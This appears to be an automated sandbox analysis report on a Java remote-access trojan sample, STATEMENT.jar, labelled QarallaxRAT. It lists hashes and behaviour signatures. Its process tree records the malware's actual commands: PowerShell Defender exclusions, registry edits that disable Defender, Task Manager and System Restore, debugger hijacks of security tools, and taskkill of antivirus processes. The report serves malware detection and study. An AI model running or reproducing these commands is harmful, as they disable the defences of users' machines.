Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
06-08-2020 07:53
General
-
Target
STATEMENT.jar
-
Size
410KB
-
MD5
c97cbc1f72a7a3100781e9e9dd0726c9
-
SHA1
cfd2845d70ba1de8fa041c844deacf5f72d360b2
-
SHA256
af2282169fd256121196373e4a1171e44ab0dd830ffd5f2b49f5b5d0a9f6b473
-
SHA512
0592feef2b9dfeeb87fd8dec6682664dbacfd4ec70e7e52d0dd08b39ba3590af4662c0cc5236bbd334e5b06c8a1207d06341b104000d889ebb6454ac2d18f9ba
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
-
Qarallax RAT support DLL 1 IoCs
-
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Drops desktop.ini file(s) 4 IoCs
-
Drops file in System32 directory 2 IoCs
-
Kills process with taskkill 19 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 125 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 412 IoCs
-
Views/modifies file attributes 1 TTPs 8 IoCs
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\STATEMENT.jar1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
-
C:\Windows\SYSTEM32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
-
C:\Windows\SYSTEM32\attrib.exeattrib -s -r C:\Users\Admin\hmJMe\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
-
C:\Windows\SYSTEM32\attrib.exeattrib +s +r C:\Users\Admin\hmJMe\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
-
C:\Windows\SYSTEM32\attrib.exeattrib -s -r C:\Users\Admin\hmJMe2⤵
- Views/modifies file attributes
-
C:\Windows\SYSTEM32\attrib.exeattrib +s +r C:\Users\Admin\hmJMe2⤵
- Views/modifies file attributes
-
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\hmJMe2⤵
- Views/modifies file attributes
-
C:\Windows\SYSTEM32\attrib.exeattrib +h +s +r C:\Users\Admin\hmJMe\Lwqbj.class2⤵
- Views/modifies file attributes
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\hmJMe','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\hmJMe\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:323⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵
-
